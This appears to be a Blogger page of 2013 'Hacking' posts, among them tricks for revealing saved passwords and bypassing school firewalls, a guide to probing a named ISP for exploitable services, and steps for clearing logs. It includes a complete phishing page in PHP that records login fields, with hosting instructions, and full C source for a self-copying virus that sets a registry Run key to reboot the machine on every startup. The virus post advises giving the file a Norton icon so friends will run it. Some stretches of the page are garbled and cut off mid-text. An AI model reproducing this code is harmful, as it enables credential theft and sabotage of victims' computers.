Which Anti Virus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 29 September 2013

How To recover Saved Password In Firefox ?

Posted on 19:52 by Unknown


1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture
3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.
4. Now click on website whose password you want to see ans click on show password as shown in below image.

(Note: It will ask for confirmation so click on yes when dialog box appears)
Read More
Posted in general, Hacking | No comments

Friday, 6 September 2013

Get to Unblocked Websites Using Google! - Google as proxy!

Posted on 18:41 by Unknown
Many are kids that go to school this will be helpful to them. I have seen tons of tutorials on using a cracker and using a proxy etc. But you need to realize that some schools block that too.

Ok, let's start from the beginning. We all know that Google is more than a search engine; we do use it as provider for email, mapping, news and many other services. Google is now also a free proxy service. Proxy is a device that stands between a PC and the internet, providing all the connections to the world wide web. What a proxy does is to receive all data from a requested site, so when you access web pages all data come from proxy.



The purpose of this is simple. To access blocked site.

Here is how to use it.

1) Open up your browser.
2) Go to - http://www.google.com/translate?langpair...inname.com OR you can also go to http://www.systranet.com/web

In the domain name type the site you are trying to access and press enter. Thats it!

Its that simple. That will translate the page from ES = Spanish to EN = English. It will act as a proxy and you can surf without any hesitation!
Read More
Posted in general, Hacking | No comments

Sunday, 1 September 2013

Password Vulnerability in All Browser

Posted on 19:20 by Unknown
How to Get Password Of Any Site using's Browser's  Vulnerability

Step 1 - Open any browser and open any website like facebook.com


Step 2 - Give your credentials (Username and Password)

Step 3 - Now right click on password pane where you input your password than choose last option > Inspect Element.

Step 4 - Now you got the Element console and automatically one line is selected, where you can see
<input type="password" class="inputtext" and so on.

Step 5 - You just simply click on "password" and rename or replace it with word "text" (without quotes) and press Enter key.

Step 6 - Now you got the password.
Read More
Posted in general, Hacking | No comments

Wednesday, 12 June 2013

How to Block a Website

Posted on 03:35 by Unknown

Some times it becomes necessary to block a website on our Computers for one or other reason. You can easily and effectivily block access to a website by adding it to your Windows HOSTS file. Once the website is blocked in the HOSTS file, it will not appear in any of the browsers. That is, the website becomes completely unavailable. 

1. Go to your HOSTS file which is located at: 

C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP 
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000 
C:\WINDOWS for Windows 98 and ME 

2. Open HOSTS with Notepad. 

The default Windows HOSTS looks like this: 
______________________ 
# Copyright © 1993-1999 Microsoft Corp. 
# 
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. 
# 
# This file contains the mappings of IP addresses to host names. Each 
# entry should be kept on an individual line. The IP address should 
# be placed in the first column followed by the corresponding host name. 
# The IP address and the host name should be separated by at least one 
# space. 
# 
# Additionally, comments (such as these) may be inserted on individual 
# lines or following the machine name denoted by a “#” symbol. 
# 
# For example: 
# 
# 102.54.94.97 rhino.acme.com # source server 
# 38.25.63.10 x.acme.com # x client host 
# 
127.0.0.1 localhost 
_____________________________ 

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type: 

127.0.0.1 name of the URL you want to block 
For example to block the website MySpace.com, simply type: 
127.0.0.1 myspace.com 
127.0.0.1 www.myspace.com 
Other parts of MySpace could be blocked in a similar way:
127.0.0.1 search.myspace.com 
127.0.0.1 profile.myspace.com 
etc etc etc… 
It is necessary to add a website with and without the “www.”. You can add any number of websites to this list. 

4. Close Notepad and answer “Yes” when prompted. 

5. After blocking the website, test it in any of the browser. If every thing is done as said above,the website must not appear in any of the web browsers. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.
Read More
Posted in Hacking | No comments

Tuesday, 11 June 2013

Shutdown Your Friend’s PC While Chatting

Posted on 06:30 by Unknown
Shutdown Your Friend’s PC While Chatting  

Hey, Here this the trick for shutdown your friend’s PC while you are chat with friend.Here is some steps to follow for doing the PC shutdown while chatting..




STEP-1:-right-click on any folder goto -> New -> Shortcut.


STEP-2:-Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c "The 31HA0w Virus Have invaded your Computer. And it is deleting your files"

STEP-3:-right-click the shortcut goto -> Properties -> Choose Icon. Now choose any icon of your choice.

STEP-4:-Compress the file in ZIP and sent it to your friend while chatting and ask him to run it

Yuppiiieee..Friend’s shutdown…
Read More
Posted in Hacking | No comments

Friday, 10 May 2013

How To Gathering Info on Remote Host for Hacking?

Posted on 22:23 by Unknown

Gathering Info on Remote Host: Essential Ingredient of Hacking into it


I get a lot of emails from people asking me how they can break into their ISP or how they can break into a system etc etc. Infact, such questions are almost the most common ones, from all the questions I get. Well, after this popular demand, I thought that an entire manual on breaking into systems was needed. So here goes..

You see, breaking into systems or getting root on a system is not as difficult as it seems. And it by no means requires you to be an Uberhacker. Getting into a system is quite easy and it requires you to know at least one programming language (preferably C), and have a more than an average IQ.  However, breaking into systems does require a bit of luck and also a bit of carelessness or stupidity on the part of the system administrator of the target system.

What I mean to say by all this is that, breaking into systems is no big deal, anyone could do that, even a script kiddie, however, the part of the entire Hacking process where more than most people falter is the remaining undetected part. Anonymity or remaining anonymous to the Server logs and preventing detection of a break-in is the most difficult part of Hacking into a system.

What separates a good Hacker from a Script Kiddie or a Lamer is that the former has more than several ways of making sure that no one even suspects that there has been a break in, while on the other hand, the later has no clue what so ever as to what he is doing or what he needs to do to prevent such detection. There are so many ready to Use canned C programs or Hacking utilities available on the net, that a huge number of wannabe hackers, download them and use them to Hack into systems. Well, not only do they do not work properly and flawlessly, they also provide no mechanism of remaining anonymous. What is more, say if you are not using a canned Hacking tool, and are also not trying to remain anonymous, then you stand a greater chance of remaining undetected than if you were using such a tool. So think before you use such tools, you might be able to get the Password file and become very kewl, however, you will certainly be caught later if not sooner.

The first step that you need to take once you have decided the target computer is to find out as much information as you can about it. You see, to break into a system you need to exploit a vulnerability existing in the services offered by it. Almost all systems have certain open ports, which have certain daemons or services running on them.

**********************

HACKING TRUTH: There are two types of ports. There are hardware ports, which are the slots existing behind the CPU cabinet of your system, into which you plug-in or connect your hardware to. For Example, COM1, COM2, Parallel Port etc.  However, we are not interested in such ports. We are concerned with the other type of ports, which are the virtual or the software ports. Such a virtual port is basically a virtual pipe through which information goes in and out. And all open ports have a service or daemon running on it. A service or a daemon is nothing but the software running on these ports, which provide a certain service to the users who connect to it. For Example, Port 25 is always open on a server handling mails, as it is port where the Sendmail service is running by default.

**********************

So basically the first step in your quest to breaking into a system is to get as much information on it, as you can. Try to get, the list of open ports, the list of services running on the respective open ports and whole lots of other kind of information to which I will come later.

Anyway, so firstly, get a good Port Scanner, preferably stealth and then do a port scan on the target host. Now one thing that you must remember while doing a port scan is the fact that there are various so called 'stealth' port scanners around which claim to be undetectable, however most of them are detectable. So instead of using such' false claims' port scanners, I suggest you code one on your own.

But why do I need to use a stealth Port Scanner and how can I code my own Port Scanner? Well, the reason as to why you need a stealth port Scanner is that many system administrators log all port scans and records the IP and other information on such attempts, this makes you susceptible to getting caught. In my opinion the best Port Scanners around are those, which send SYN/FIN packets from a spoofed host, making logging useless. Such a port Scanner would be coded in C, but will not run in Windows. This was just an idea, now it is up to you to code it yourself.

Anyway, let me assume that you have got hold of a good 'impossible to detect' Port Scanner, now scan the target system for all open ports and record the open lists:

Note: In this manual, I have taken up my ISP as an example target system. It would be foo-barred throughout as xxx.bol.net.in

In my case, I found that the following ports were open:

Port Number         Service

21                           FTP       

23                           Telnet

25                           SMTP

53                           DNS
79                           Finger

80                           HTTP     

110                         POP

111                         Not Useful
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 System running and also the FTP daemon running. Well, actually it is the login prompt of the daemon banner which gives us the Operating System running on it.  Normally, a typical daemon banner, would have the following Login prompt:

220 xxx2.bol.net.in FTP server (Digital UNIX Version 5.60) ready.

User (bol.net.in:(none)):

Notice the System name in the brackets on the first line. However, normally almost all FTP daemons are better configured (that is the case in the example target system: xxx.bol.net.in)and their login prompt is somewhat like the below:

220 ftp2.xxx.bol.net.in FTP server ready.

User (mail2.bol.net.in:(none)):

See, no Operating System name. However, with the help of some kewl commands, such systems too can be reveal the OS running on them. However, before we go on, there is one thing that you have to be clear about. Now, we had FTP'ed to xxx.bol.net.in, so you normally expect to connect to Port 21 of xxx.bol.net.in, however that is not true. (Atleast in this case.) If you look at the daemon banner again, then you would notice that the last line says:

220 ftp2.xxx.bol.net.in FTP server ready.

Now how did that happen? Well, is Port 21 not open on xxx.bol.net.in ? Well, no and yes. What actually happens is that, Port 21 of xxx.bol.net.in is open and a daemon there is listening for connections. As soon as a connection is established, it transfers the control or connected the visitor to ftp2.xxx.bol.net.in, which is on the same network as xxx.bol.net.in. Now this, ftp.xxx.bol.net.in system is solely a FTP machine. It has no other services running.  So whatever information, we gather from such a FTP port is not of xxx.bol.net.in but of ftp2.bol.net.in.  Get it?

Anyway, when you get the login prompt, then login anonymously with the anonymous as the Username and a false email address as the password. 

220 ftp2.xxx.bol.net.in FTP server ready.

User (ftp2.xxx.bol.net.in:(none)): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password: xxx@linux.net

230 User anonymous logged in.  Access restrictions apply.

Even if you have an account at the FTP server into which you plan to break in, it is always better not to use that pair of Username and Password. Logging in anonymously has many advantages. Say if you did cause some harm to the target system and if you use your (Nonanonymous) Username and Password pair, then if you were not able to edit the server logs you could get into some serious trouble. [Well actually not much, only say your account might be disabled.  However, it could be worse.]

Ok, you are in, now let us get the FTP client to tell us which commands are available by typing the help command.

ftp> help

Commands may be abbreviated.  Commands are:

!                 delete            literal            prompt

?               debug            ls                   put

append     dir                 mdelete         pwd

asc                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                O    CWD     STAT    XRMD    SIZE

   REIN*   MODE    MSND*   REST    XCWD    HELP    PWD     MDTM

   QUIT    RETR    MSOM*   RNFR    LIST    NOOP    XPWD  I mean by that is that all remote FTP commands have to be preceded by the word 'literal'. For example, say you want to execute the remote FTP command: 'stat', then you would type:

 

ftp> literal stat

***************
HACKING TRUTH: According to FTP help, the literal command is described as:

ftp> help literal

literal         send arbitrary ftp command

***************

Anyway, amongst the remote FTP commands, the commands of interest to us are-: 'stat' and 'syst'. Let us see what they return when executed-:

ftp>literal stat

211- ftp2.xxx.bol.net.in FTP server status:

     Version 5.60

     Connected to 203.xx.251.198 (203.xx.251.198)

     Logged in anonymously

     TYPE: ASCII, FORM: Nonprint; STRUcture: File; transfer MODE: Stream

   211- No data connection

211 End of status

Note: The IP address is of xxx.bol.net.in and not your machine.

ftp> literal syst

215 UNIX Type: L8 Version: BSD-198911

Voila, we get the Operating System name running on ftp2.xxx.bol.net.in. At last some useful information.

Finger and HTTP both failed, what do we do now? Let us turn to the den of the Buggiest daemon on Earth i.e. Sendmail: Port 25, the SMTP port.

Sendmail is certainly the buggiest daemon on earth; it has the highest number of known exploits amongst all the daemons. So this probably should get us through. Let us telnet to Port 25 and find out whether an exploitable version of Sendmail is running.

C:\windows> telnet xxx.bol.net.in 25

220 xxx.bol.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/27Jun00-0346PM) Thu, 29 Jun 2000 14:18:12 0530 (IST)


When you telnet to Port 25, then the first thing that you come across would be a something like the above welcome daemon banner. A daemon banner is a Hacker's best friend. It reveals important information about the host, which proves to be invaluable in breaking into it. It basically tells you which daemon or service is running on that port and also the version of that particular service. Like for example, in this case, the Sendmail daemon banner tells us that ESMTP Sendmail 8.9.1 is running and it also gives us other information about the host at which this service is running.

Anyway, getting back to the topic, this banner reveals a big vulnerability existing in the host computer. It tells us that xxx.bol.net.in is running an old, vulnerable version of Sendmail. The latest version is Sendmail 8.9.4 (correct me if I am wrong.), so this particular version of Sendmail wouldn't be without any bugs.

So then what you do is visit PacketStorm or search at your favorite Hacking stuff related search engine for a C program which demonstrates how to exploit version 8.9.4 of Sendmail. Now, all this might sound a bit too simple, well it certainly isn't, read on for more info.


Now, there are a couple of things that you need to keep in mind while getting this done. Say, you have found out that the victim runs Sendmail 8.9.4, now you cannot simply break in by running any exploit for this version. By that what, I mean to say is that, an exploit, which is coded to be executed on a Linux platform, will not work if you try to compile and run it on a Windows platform. So basically before you execute the 'kewl' exploit program that you downloaded, you should find out which platform it is meant for and if you are not running that platform, then you will need to get your gray cells working.

This is the stage where real hackers are differentiated between script kiddies, this is when those people who really know something prevail.  Normally say if a exploit is designed to work on Linux, then if you edit its code and change its header files (if necessary), then that particular exploit can be made to run on Windows too. However, there are certain exploits, which simply would not run on a different OS than it is designed too.

Anyway, let us get back to point. You have edited the exploit code and made it compatible with your platform. Now what else? Another thing that you want to keep in mind is the Operating System, which the exploit can exploit. You see, there are certain exploits, which work only if the victim system is running a specific Operating System. For Example,

There was once a Sendmail hole, which worked only if the target System was running Sun OS without which, it simply refused to even work.

So in some cases it becomes necessary, to find out the Operating System running at the target system. Although not all exploits require the target system to be running a specific system, but why take a chance. Right?
So basically you should be aware of the following things while getting a ready to use exploit-:

1.)            The Daemon name and version you are trying to exploit For Example, Sendmail 8.9.4

2.)            The Operating System at which it is designed to run. (If necessary)

3.)            The operating System it requires the target system to be running. (If necessary)

That brings us to as to how to find out the Operating System running at the target system? Well, the HTTP port holds the key. Simply, telnet to Port 80 of the target system.

C:\windows>telnet xxx.bol.net.in 80

Now, once you get the input prompt, then, type an invalid HTTP command. For Example, X or Iamgreat or abc etc. Just type anything as long as it is not a valid HTTP command. Then press enter twice.

 

***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********

On Port 80 of my example target system, I type simply 'abc' and press enter twice. This is the kind of response I get:


HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it(again not so important), but it also gives us the OS name and OS version, it is running. Wow!!! It gives hackers who want to break into their server the ultimate piece of information, which they require.


Well, these were the common ways of finding out more information about a host in your quest to break into it. I will soon be updating this manual, hope you enjoyed the first edition. Till the next update, goodbye. 
Read More
Posted in Hacking | No comments

Saturday, 13 April 2013

Bypass School/College/Office Firewall

Posted on 08:10 by Unknown

If you are in school,college or in office, than you want to visit your favorite social networking website like facebook,youtube etc. 


Now what do to because you are not allow to surfing these website, Now the question is how network administrator block these website. The simple answer is through firewall, if you wanna visit block website the simplest method is to use proxy but its not reliable . 

So, what is reliable and easy to use. Follow these easy steps to surf anonymously. 

1. First you need to Download Ultrasurf. 

2. You will get a zipped file with a .exe file in it. Click on it 

3. It will start ultra surf and automatically connect to its server. 

4. Even it will open your Internet explorer automatically. Now you can have an unblocked and secure to internet. 

5. If you want to use ultrasurf on Firefox, you need to download the firefox plugin too: download here 

If you are connected to internet through a proxy server then ultrasurf will detect it. If somehow it does not detect the proxy server then you can manually enter your proxy server 
Read More
Posted in Hacking | No comments

Friday, 12 April 2013

How to Hackers Erase Tracks After Hacking

Posted on 19:35 by Unknown

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks. 

Here are some of the techniques that an attacker can use to cover his tracks:- 

(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access. 
Just point it at the victim’s system as follows: 
C:\>auditpol \\192.168.10 /disable 
Auditing Disabled 

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared. 
It is used as follows: 

Elsave -s \\192.168.13.10 -1 “Security” -C 

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.
Read More
Posted in Hacking | No comments

Creating a fake ( Phishing ) page of gmail,facebook ,yahoo, myspace etc.

Posted on 07:07 by Unknown

DISCLAIMER
I am not responsible for any damage caused by the user.This tutorial is purely for educational purposes.Please do not misuse this tutorial.
.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.

So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to go after he click on submit button.
Save the page as fish.php

Now you need to edit the "login.htm"file we save earlier. So go to that and open it with notepad.
now search for any htm like "action=" which has something with login. And replace the URL with "fish.php".

Also create a blank txt file with name "log.txt". This file would be used to save your logins and passwords.
Now you are done,

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by your host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you entered previously would be saved in the log.txt file.

Here you have a working phishing page


Note:- For this trick require website on which you have to put three file fish.php,login.html,log.txt (where your password will be store).
Read More
Posted in Hacking | No comments

Thursday, 11 April 2013

Recover Password Of --> Linux Ubuntu , Windows XP, Windows Vista ,Windows 7

Posted on 08:19 by Unknown

Somethims it happens that i forget my password.. what to do ??? here i will show you two ways for different OS (linux Ubuntu 
and Windows XP ) 

1) Linux: 

1. Reboot your computer and when you see GRUB Loading Screen press ESC so you come into the menu. 
2. Now choose recovery mode 
3. Chosse root shell prompt 
4. now the system will show you cmd 
to reset your pass use "passwd" 
5. if you are finish with that reboot your system 
command : reboot-f 

2 ) Linux 

1) choose the regular boot 
2) use "e" to edit the settings 
3) now hit the arrow key down over options and then use "e" to change to the edit mode 
4) ok now you will get a scree with "single" 
5) remove single with delete key and add this : rw init=/bin/bash 
6) ok use "B" to boot with this settings 
7) and now you get cmd and you can use the things I told you with the other method 

3) Windows versions 

Its always the same way you only need to download the right Ophcrack version for you operating system. 
1. download ImgBurn here 
2. Download Ophcrack : XP Windows Vista, 7 
3) now burn Ophcrack with ImgBurn on a dvd 
4) start your pc and do the dvd into it 
5) open bios and choose boot from dvd 
6) it will take 5 minutes but then you will get all Users from this pc and their passwords 
Read More
Posted in Hacking | No comments

Wednesday, 10 April 2013

A Virus Program to Restart the Computer at Every Startup (DANGEROUS TO USE)

Posted on 08:39 by Unknown

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded. 
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding. 
Here is the source code. 


#include<stdio.h>
#include<conio.h>
#include<math.h>
int found,drive_no;char buff[128]; 
void findroot() 
{ 
int done; 
struct ffblk ffblk; //File block structure 
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive 
if(done==0) 
{ 
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not 
if(done==0) 
{ 
found=1; //means that the system is already infected 
return; 
} 
drive_no=1; 
return; 
} 
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0); 
if 
(done==0) 
{ 
found=1;return; 
} 
drive_no=2; 
return; 
} 
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0); 
if(done==0) 
{ 
found=1; 
return; 
} 
drive_no=3; 
return; 
} 
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC); 
if(done==0) 
{ 
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0); 
if(done==0) 
{ 
found=1; 
return; 
} 
drive_no=4; 
return; 
} 
else 
exit(0); 
} 
void main() 
{ 
FILE *self,*target; 
findroot(); 
if(found==0) //if the system is not already infected 
{ 
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no) 
{ 
case 1: 
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup 
break; 
case 2: 
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
D:\\windows\\system\\sysres.exe”); 
break; 
case 3: 
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
E:\\windows\\system\\sysres.exe”); 
break; 
case 4: 
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”); 
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
CurrentVersion\\Run \/v sres \/t REG_SZ \/d 
F:\\windows\\system\\sysres.exe”); 
break; 
default: 
exit(0); 
} 
while(fread(buff,1,1,self)>0) 
fwrite(buff,1,1,target); 
fcloseall(); 
} 
else 
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart} 


NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR. 
Testing And Removing The Virus From Your PC 

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again. 
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps. 

1. Reboot your computer in the SAFE MODE 
2. Goto X:\Windows\System (X can be C,D,E or F) 
3.You will find a file by name sysres.exe, delete it. 
4.Type regedit in run.You will goto registry editor.Here navigate to 
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully. 
Logic Behind The Working Of The Virus 

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments. 

LOGIC: 
1. First the virus will find the Root partition (Partition on which Windows is installed). 

2. Next it will determine whether the Virus file is already copied(Already infected) 
intoX:\Windows\System 

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup. 

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer. 

This process is repeated every time the PC is restarted. 
NOTE: The system will not be restarted as soon as you double click the Sysres.exefile.The restarting process will occur from the next boot of the system. 
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional) 
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive. 
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
Read More
Posted in Hacking | No comments
Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Different Types Of Computer Ports
  • Features Of Android KitKat
    1) The new Phone (Dialer) app is now linked online with Google Maps. This means if your type Big Bazaar in Phone app (Not Search) and if tha...
  • C Program Library files(Header Files)
    1. <stdio.h>: input and output  function in program. 2. <conio.h>: to clear screen and  pause information function. 3. <ctype...
  • Free Download E-DRAW MAX
    link 1 : http://hotfile.com/dl/ 254163134/8de2252/EDM.rar.html
  • Different Operating System and Their RAM Support
    Windows 8 64 bit Enterprise  Professional : 512 GB Windows 8 64 bit :128 GB Windows 8 32 bit : 4 GB Windows 7 64 bit Ultimate, Enterprise ...
  • How To Protect Your Computer From Keyloggers
    A keylogger is a small program that stores each keystroke a user types on a specific computer's keyboard. It is capable to send log file...
  • GTU Paper Solution and Material as Per GTU syllabus
    Go to this website and download the Study material of GTU Syllabus. http://gtu-paper.blogspot.com/
  • How to Hackers Erase Tracks After Hacking
    Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacke...
  • Shutdown Your Friend’s PC While Chatting
    Shutdown Your Friend’s PC While Chatting   Hey, Here this the trick for shutdown your friend’s PC while you are chat with friend.Here is som...
  • How to read the barcodes???
    Trick to read the barcodes The first 3 digits of the barcode is the country code wherein the product was made. CODE COUNTRY 00-13 USA & ...

Categories

  • Android
  • Android Apps
  • apps
  • BlackBerry
  • Cprog
  • dfd
  • erd
  • Facebook
  • general
  • Hacking
  • HTC
  • ios
  • java
  • Mobile
  • nokia
  • Samsung
  • Srs
  • Window Apps
  • Windows 8

Blog Archive

  • ▼  2013 (91)
    • ▼  November (6)
      • GTU Paper Solution and Material as Per GTU syllabus
      • Different Operating System and Their RAM Support
      • Free Download E-DRAW MAX
      • Play HIGH GRAPHIC GAMES like-GTA on your PC withou...
      • C Program Library files(Header Files)
      • Features Of Android KitKat
    • ►  October (5)
    • ►  September (17)
    • ►  August (3)
    • ►  July (8)
    • ►  June (13)
    • ►  May (12)
    • ►  April (27)
Powered by Blogger.

About Me

Unknown
View my complete profile